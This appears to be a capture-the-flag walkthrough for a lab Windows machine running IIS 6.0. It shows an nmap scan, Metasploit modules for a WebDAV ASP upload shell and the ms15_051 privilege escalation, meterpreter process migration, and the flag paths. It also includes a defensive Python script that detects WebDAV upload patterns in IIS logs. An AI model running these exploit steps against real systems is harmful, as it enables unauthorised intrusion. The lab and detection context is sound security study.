http://blog.yutian233.xyz/
Target machine description
Checklist
Information gathering
- nmap
- iis 6
Getting a shell
- iis_webdav_upload_asp
Privilege escalation
- ms15_051_client_copy_image
Information gathering
Target IP
Port scan
nmap 10.10.10.15 -A
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
This tells us the IIS version is 6.0.
MSF
use exploit/windows/iis/iis_webdav_upload_asp
This gives us a shell as a low-privilege user.
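From the defender's side, the iis_webdav_upload_asp module relies on WebDAV write methods (a PUT of a file followed by a MOVE that renames it to an .asp name), and that sequence is visible in the IIS W3C logs. The following is an added example, not code from the original post or from Metasploit: it parses constructed sample log lines and flags WebDAV write activity, a PUT followed by a MOVE of the same path from one client, and a later successful request for a script file with the same basename. The log excerpt, IP addresses and filenames are constructed sample data.

```python
# Constructed IIS 6.0 W3C log excerpt (sample data, not from the original post).
# IIS logs the MOVE source path but not its Destination header, so the rename
# target is inferred from the later request for the same basename.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-01-01 10:00:01 10.10.10.15 GET /index.htm - 80 - 10.10.14.5 Mozilla/5.0 200
2023-01-01 10:00:05 10.10.10.15 PUT /tmp_ab12.txt - 80 - 10.10.14.5 - 201
2023-01-01 10:00:06 10.10.10.15 MOVE /tmp_ab12.txt - 80 - 10.10.14.5 - 201
2023-01-01 10:00:08 10.10.10.15 GET /tmp_ab12.asp - 80 - 10.10.14.5 - 200
2023-01-01 10:01:00 10.10.10.15 OPTIONS / - 80 - 10.10.14.9 - 200
"""

# WebDAV methods that modify content on the server; none of them belong in
# ordinary browsing traffic to an "Under Construction" site.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
# Extensions that IIS 6 hands to the ASP script engine.
SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx", ".cer", ".cdx")

def parse_w3c(text):
    """Yield one dict per log row, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):   # skip truncated or malformed rows
            continue
        yield dict(zip(fields, parts))

def detect_webdav_upload(text):
    """Return (client, finding, method, path) tuples for suspicious WebDAV activity."""
    findings = []
    uploads = set()   # (client, path-without-extension) seen in a PUT
    for row in parse_w3c(text):
        client, method, stem = row["c-ip"], row["cs-method"], row["cs-uri-stem"].lower()
        base = stem.rsplit(".", 1)[0]
        if method in WRITE_METHODS:
            findings.append((client, "webdav_write", method, stem))
        if method == "PUT":
            uploads.add((client, base))
        elif method == "MOVE" and (client, base) in uploads:
            findings.append((client, "put_then_move", method, stem))
        elif stem.endswith(SCRIPT_EXT) and (client, base) in uploads and row["sc-status"] == "200":
            findings.append((client, "script_run_after_upload", method, stem))
    return findings

if __name__ == "__main__":
    for finding in detect_webdav_upload(SAMPLE_LOG):
        print(finding)
```

On a real host, run it over the files under the IIS log directory; the OPTIONS probe from the second client is deliberately left unflagged so the rule stays focused on write activity rather than on reconnaissance noise.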
System
use post/multi/recon/local_exploit_suggester
The one used here is the exploit marked in red in the screenshot (ms15_051_client_copy_image).
Before escalating privileges, the session first needs to be migrated to another process.
meterpreter > getpid
Current pid: 3592
# get the PID of the current msf shell
PID migration
meterpreter > migrate 2676
[*] Migrating from 3592 to 2676...
[*] Migration completed successfully.
Now the exploit can be run.
This gives us SYSTEM.
root.txt
- C:\Documents and Settings\Administrator\Desktop
user.txt
- C:\Documents and Settings\Lakis\Desktop